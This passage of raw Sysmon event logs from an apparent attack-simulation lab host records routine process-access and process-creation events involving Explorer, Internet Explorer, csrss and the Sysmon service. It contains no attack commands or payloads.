Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.826{08A6967A-4754-6000-1705-000000009A01}34086864C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\windows.storage.dll+1241fa|C:\Windows\System32\windows.storage.dll+123f5a|C:\Windows\System32\SHELL32.dll+77991|C:\Windows\System32\SHELL32.dll+767f6|C:\Windows\System32\SHELL32.dll+110821|C:\Windows\System32\SHELL32.dll+7888e|C:\Windows\System32\windows.storage.dll+12f9e|C:\Windows\System32\windows.storage.dll+131a1|C:\Windows\System32\windows.storage.dll+12ddf|C:\Windows\System32\SHELL32.dll+1108a7|C:\Windows\System32\SHELL32.dll+7888e|C:\Windows\System32\SHLWAPI.dll+e1d7 154100x800000000000000013029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:40.822{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe11.00.14393.2007 (rs1_release.171231-1800)Internet ExplorerInternet ExplorerMicrosoft CorporationIEXPLORE.EXE"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=DED3D744D46A5CE7965CE2B75B54958A,SHA256=70C9616C026266BB3A1213BCC50E3A9A24238703FB7745746628D11163905D2F,IMPHASH=9BB01C801600CEBDCA166D0534E98CE6{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000013074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.998{08A6967A-4754-6000-1705-000000009A01}3408936C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.982{08A6967A-4754-6000-1705-000000009A01}3408936C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.982{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.982{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7227|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7192|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7227|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7192|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7227|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\windows.storage.dll+e7192|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+e7177|C:\Windows\System32\windows.storage.dll+e6b53|C:\Windows\System32\windows.storage.dll+e69d9|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6437|C:\Windows\System32\shcore.dll+6327|C:\Windows\System32\shcore.dll+629d|C:\Windows\System32\shcore.dll+61aa|C:\Windows\System32\windows.storage.dll+13656e|C:\Windows\System32\windows.storage.dll+e6aac|C:\Windows\System32\windows.storage.dll+e6888|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+13655c|C:\Windows\System32\windows.storage.dll+e6aac|C:\Windows\System32\windows.storage.dll+e6888|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.435{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\windows.storage.dll+13655c|C:\Windows\System32\windows.storage.dll+e6aac|C:\Windows\System32\windows.storage.dll+e6888|C:\Windows\System32\shcore.dll+2ed2b|C:\Windows\System32\shcore.dll+2ec8f|C:\Windows\SYSTEM32\IEFRAME.dll+4d79c|C:\Windows\SYSTEM32\IEFRAME.dll+4d595|C:\Windows\SYSTEM32\IEFRAME.dll+4d332|C:\Windows\SYSTEM32\IEFRAME.dll+4cfc7|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.420{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\iertutil.dll+36d81|C:\Windows\SYSTEM32\iertutil.dll+36930|C:\Windows\SYSTEM32\iertutil.dll+34b5c|C:\Windows\SYSTEM32\iertutil.dll+34f0f|C:\Windows\SYSTEM32\iertutil.dll+480c8|C:\Windows\SYSTEM32\IEFRAME.dll+2bb1c2|C:\Windows\SYSTEM32\IEFRAME.dll+c63f5|C:\Windows\SYSTEM32\IEFRAME.dll+f7ba8|C:\Windows\SYSTEM32\IEFRAME.dll+f7ab0|C:\Windows\SYSTEM32\IEFRAME.dll+2e821|C:\Windows\SYSTEM32\IEFRAME.dll+2a83a6|C:\Windows\SYSTEM32\IEFRAME.dll+152634|C:\Windows\SYSTEM32\IEFRAME.dll+ccc61|C:\Windows\SYSTEM32\IEFRAME.dll+1526bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.389{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.326{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:41.326{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84